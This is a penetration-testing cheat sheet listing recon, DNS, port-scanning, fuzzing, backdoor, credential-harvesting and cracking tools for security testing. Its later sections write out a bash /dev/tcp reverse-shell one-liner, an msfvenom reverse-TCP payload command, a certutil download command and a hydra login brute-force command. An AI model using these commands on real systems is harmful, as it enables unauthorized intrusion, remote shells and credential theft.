Penetration Test

Information Gathering

Search Engine

  • SHODAN

    Search Engine for the Internet of Everything

    # Search Query
    #   <keyword> ...
    #   [{[-(filter out)]<attr>:<value>,...(or)} ...(and)]
    #     country:{<country>|tw|us}
    
    hostname:google.com,facebook.com
    http.html:"index of" country:tw
    Microsoft-IIS port:8530,8531 country:tw -http.status:403  # WSUS
    
  • Censys

    Censys helps organizations, individuals, and researchers find and monitor every server on the Internet to reduce exposure and improve security.

  • Google Hacking Database

OSINT

  • OSINT Framework
  • maltego

    A platform for open-source intelligence (OSINT) and cyber investigations

DNS Enumeration

  • dnsdumpster

    DNS recon & research; find & look up DNS records

  • crt.sh

    Enter an identity (domain name, organization name, etc.) to search certificate transparency logs

  • robtex

    Subdomains

  • dnsenum

    # dnsenum
    #   [--noreverse]
    #   [--recursion]
    #   <domain>
    
    dnsenum google.com
    
  • gobuster

    # gobuster vhost
    #   [-H, --headers="<key>:<value>" ...]
    #   [--exclude-length={<length>|<length>-<length>},...]
    #   [--append-domain] --domain=<domain>
    #   -w, --wordlist=<wordlist>
    #   -u, --url=<url>
    
    gobuster vhost --exclude-length=100,200-300 --append-domain --domain=${domain:?} --wordlist=/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt --url=http://${domain:?}
    
  • knockpy.py

Domain Information

DNS Lookup

  • dig

    # dig
    #   [@<server>]
    #   {<name>|-x <addr>} ...
    #   [<type>|A|MX|NS|TXT|CNAME]
    #   [{+<option>|+trace|+https|+nssearch} ...]
    
    dig @8.8.8.8 www.google.com A
    dig www.google.com A +trace
    dig google.com +nssearch
    
    dig -x 8.8.8.8
    
  • nslookup

    # nslookup
    #   [{-type={<type>|A}|-<option>[=<value>]} ...]
    #   {<name>|<addr>}
    #   [<server>]
    
    nslookup -type=A www.google.com 8.8.8.8
    
    nslookup 8.8.8.8
    
  • drill

    # drill
    #   [-T(enable trace)]
    #   {<name>|-x <addr>}
    #   [@<server>]
    #   [<type>|A]
    
    drill www.google.com @8.8.8.8 A
    drill -T www.google.com          # trace
    
    drill -x 8.8.8.8
    

Recon

Port Scanning

  • Nmap

    # nmap
    #   [-v(verbose)]
    #   [-n(disable DNS resolution)]
    #   [-T{0..5}(5 is fastest)]
    #   [-A(same as -O -sV -sC --traceroute)]
    #   [-Pn(skip host discovery)]
    #   [-sn(disable port scan)]
    #   [-O(enable OS detection)]
    #   [-sS(TCP SYN, default)]
    #   [-sU(UDP scan)]
    #   [-sC(same as --script=default)]
    #   [-sV(show service version info)]
    #   [--script={<pattern>|"http-*"|default|*},...]
    #   [--script-trace]
    #   [--script-help <pattern>(/usr/share/nmap/scripts)]
    #   [-p {-|{[T:|U:]{<port>|<port>-<port>},...},...}]
    #   {<hostname>|<ip>|<ip range>|<subnet>}
    
    nmap -A ${host:?}                      # Scan with default setting.
    nmap --script="http-*" -p80 ${host:?}  # Scan HTTP service.
    nmap -v -n -T5 -sS -p- ${host:?}       # Scan all ports.
    nmap -v -n -sCV -p- ${host:?}          # Scan all ports with extra info.
    

Directory Enumeration

  • dirsearch

    # dirsearch
    #   [-m, --http-method=<method>]
    #   [-H, --header="<name>: <value>" ...]
    #   [--cookie="<name>=<value>;..."]
    #   [-e, --extensions={<extension>|php|asp},...(only replaces %EXT% by default)]
    #   [-f, --force-extensions]
    #   [--prefixes=<prefix>,...]
    #   [--suffixes=<suffix>,...]
    #   [-r, --recursive]
    #   [--crawl]
    #   [-i, --include-status={<code>|<code>-<code>},...]
    #   [-x, --exclude-status={<code>|<code>-<code>},...]
    #   [--exclude-text=<text> ...]
    #   [--exclude-regex=<regex> ...]
    #   [--exclude-redirect=<redirect url> ...]
    #   -u, --url=<url>
    
    dirsearch -r -u ${url:?}
    
  • gobuster

    # gobuster dir
    
    gobuster dir --url ${url:?} --wordlist ${wordlist:-/usr/share/wordlists/dirb/common.txt} -t ${threads:-100}
    
  • dirbuster

    # dirbuster
    
  • dirb

    # dirb
    #   [-H <header_string>]
    #   [-c <cookie_string>]
    #   [-X {<extension>|.html}]
    #   [-N <status_code>(ignore responses with this code)]
    #   <url>
    #   [<wordlist>,...]
    
    dirb ${url:?} ${wordlist}
    
  • wfuzz

    wfuzz -c -z file,${wordlist:-/usr/share/wordlists/dirb/common.txt} -hc ${hidecode:-404} ${url:?}/FUZZ
    
  • ffuf

Secret Dumper

  • git-dumper

Fuzzing

  • wfuzz

    Usage:
      $ wfuzz -c -z file,${wordlist:?} -hl ${hideline:-BBB} ${url:?}/?FUZZ{<baseArg1>}=,FUZ2Z{<baseArg2>}=
    Description:
      Hide all results whose line count equals that of the baseline request made with parameters <baseArg1> and <baseArg2> (BBB refers to that baseline).

Tech Stack

Connection

  • /dev/tcp/<HOST>/<PORT>
  • telnet
  • nc / ncat / socat
  • $ certutil.exe -urlcache -f <url> <filename>
  • HTTPie

Intercepting Proxy

  • Burp Suite
  • ModHeader

Public Temp Server

  • webhook.site
    • unique URL (https / CORS)
    • unique email
  • beeceptor
  • hookbin.com
  • requestbin.net

Vulnerability Scanner

  • nikto
  • OpenVAS
  • trivy
  • ZAP

Exploit

Backdoor

  • weevely
  • veil
  • BeEF
  • cobaltstrike

Reverse Shell

Enable PTY

python3 -c 'import pty;pty.spawn("/bin/bash")'

  • $ bash -c "/bin/bash -i >& /dev/tcp/${HOST}/${PORT} 0<&1"
  • reverse ICMP shell (icmpsh)
  • $ msfvenom --list payloads
    • $ msfvenom -p windows/x64/shell_reverse_tcp -f aspx -o reverse.aspx LHOST=${host} LPORT=1337

Secret

Credential Harvesting

  • Responder
  • Inveigh
  • Mimikatz
  • ntdsutil
  • secretsdump

Cracker

  • untwister
  • c-jwt-cracker
  • Password Cracker

    • hashcat
    • John the Ripper
  • Login Cracker

    • hydra

      $ hydra -l <username> -P /usr/share/wordlists/nmap.lst <server> http-post-form "/login.php:username=^USER^&password=^PASS^&sub=Login:Invalid username or password"
      

Word List

  • wordlists
  • seclists
  • crunch

Decrypt

  • PyCryptodome
  • Crypto.Util.number

    Function   Comment
    inverse    modular inverse
  • Sage